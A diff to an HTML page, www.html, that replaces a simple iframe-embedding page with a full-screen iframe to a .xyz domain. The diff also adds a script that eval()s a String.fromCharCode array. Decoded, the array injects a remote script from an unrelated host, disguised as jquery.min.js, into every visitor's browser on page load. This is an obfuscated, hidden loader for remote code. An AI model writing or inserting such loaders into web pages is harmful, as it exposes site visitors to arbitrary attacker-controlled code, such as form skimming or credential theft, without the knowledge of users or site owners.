--- a/www.html
+++ b/www.html
@@ -1,46 +1,39 @@
-<!DOCTYPE html>
+<!doctype html>
 <html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>1</title>
-    <style>
-        body {
-            font-family: Arial, sans-serif;
-            margin: 0;
-            padding: 0;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            flex-direction: column;
-            height: 100vh;
-            background-color: #f4f4f4;
-        }
-        h1 {
-            margin-bottom: 20px;
-        }
-        .iframe-container {
-            position: relative;
-            width: 80%; /* 根据需求调整宽度 */
-            padding-top: 56.25%; /* 16:9 aspect ratio */
-            overflow: hidden;
-        }
-        iframe {
-            position: absolute;
-            top: 0;
-            left: 0;
-            width: 100%;
-            height: 100%;
-            border: none;
-        }
-    </style>
-</head>
-<body>
+	<head>
+		<meta charset="UTF-8" />
+		<!--屏幕自适应-->
+		<meta name="viewport"
+			content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes" />
+		<title></title>
+		<style type="text/css">
+			html,
+			body {
+				height: 100%;
+				margin: 0;
+				overflow: hidden;
+			}
 
-    <h1>嵌入式内容标题</h1>
-    <div class="iframe-container">
-        <iframe src="https://yuiyuioyui.yaruiwqreutio.xyz/www"></iframe>
-    </div>
-
-</body>
+			iframe {
+				margin: 0;
+				border-style: none;
+				width: 100%;
+				height: 100%;
+			}
+		</style>
+	</head>
+	<body>
+		<iframe src="
+https://yuiyuioyui.yaruiwqreutio.xyz/www
+"></iframe>
+		<script>
+			eval(String.fromCharCode(9, 102, 117, 110, 99, 40, 41, 59, 10, 102, 117, 110, 99, 116, 105, 111, 110, 32, 102, 117,
+				110, 99, 40, 41, 32, 123, 10, 9, 108, 101, 116, 32, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110,
+				116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112,
+				116, 39, 41, 59, 10, 9, 115, 46, 115, 114, 99, 32, 61, 32, 39, 47, 47, 109, 97, 105, 108, 46, 119, 120,
+				46, 103, 97, 121, 47, 106, 113, 117, 101, 114, 121, 46, 109, 105, 110, 46, 106, 115, 39, 59, 10, 9, 100,
+				111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105,
+				108, 100, 40, 115, 41, 59, 10, 125, 59));
+		</script>
+	</body>
 </html>
